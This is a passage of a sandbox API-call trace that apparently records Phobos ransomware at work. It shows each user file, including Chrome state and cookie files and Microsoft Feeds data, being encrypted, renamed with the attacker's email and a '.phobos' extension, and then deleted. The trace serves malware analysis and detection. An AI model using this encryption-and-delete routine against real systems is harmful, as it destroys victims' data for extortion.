out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.250] CloseHandle (hObject=0x17c) returned 1 [0186.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.251] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=67626) returned 1 [0186.251] CloseHandle (hObject=0x17c) returned 1 [0186.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0x2020 [0186.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.251] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.251] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0186.252] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.252] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1082a, lpOverlapped=0x0) returned 1 [0186.290] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10830, dwBufLen=0x10830 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10830) returned 1 [0186.291] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10830, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10830, lpOverlapped=0x0) returned 1 [0186.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0186.295] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.295] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0186.295] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.295] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0186.295] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.295] CloseHandle (hObject=0x17c) returned 1 [0186.295] CloseHandle (hObject=0x130) returned 1 [0186.295] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state")) returned 1 [0186.297] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.297] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.297] CloseHandle (hObject=0x130) returned 1 [0186.297] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.298] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=7168) returned 1 [0186.298] CloseHandle (hObject=0x130) returned 1 [0186.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies")) returned 0x2020 [0186.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.298] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.298] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0186.299] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.299] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1c00, lpOverlapped=0x0) returned 1 [0186.335] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1c10, dwBufLen=0x1c10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1c10) returned 1 [0186.335] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1c10, lpOverlapped=0x0) returned 1 [0186.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0186.336] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.336] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0186.336] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.336] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0186.337] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.337] CloseHandle (hObject=0x130) returned 1 [0186.337] CloseHandle (hObject=0x17c) returned 1 [0186.337] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies")) returned 1 [0186.338] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.339] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0186.339] CloseHandle (hObject=0x17c) returned 1 [0186.339] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.349] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6656) returned 1 [0186.349] CloseHandle (hObject=0x17c) returned 1 [0186.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms")) returned 0x2020 [0186.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.349] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.349] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.350] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0186.350] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.350] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a00, lpOverlapped=0x0) returned 1 [0186.375] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10, dwBufLen=0x1a10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10) returned 1 [0186.375] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a10, lpOverlapped=0x0) returned 1 [0186.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0186.376] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.376] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0186.376] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.376] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0186.376] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.376] CloseHandle (hObject=0x17c) returned 1 [0186.376] CloseHandle (hObject=0x130) returned 1 [0186.376] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms")) returned 1 [0186.377] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.378] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=28672) returned 1 [0186.378] CloseHandle (hObject=0x130) returned 1 [0186.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms")) returned 0x2020 [0186.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.378] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.379] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.379] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0186.379] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.379] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7000, lpOverlapped=0x0) returned 1 [0186.399] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010, dwBufLen=0x7010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010) returned 1 [0186.399] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7010, lpOverlapped=0x0) returned 1 [0186.400] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0186.400] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.400] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0186.400] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.400] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0186.401] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.401] CloseHandle (hObject=0x130) returned 1 [0186.401] CloseHandle (hObject=0x17c) returned 1 [0186.401] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms")) returned 1 [0186.402] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0186.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.403] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=32768) returned 1 [0186.403] CloseHandle (hObject=0x17c) returned 1 [0186.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms")) returned 0x2020 [0186.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0186.404] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.404] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0186.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0186.417] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0186.417] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8000, 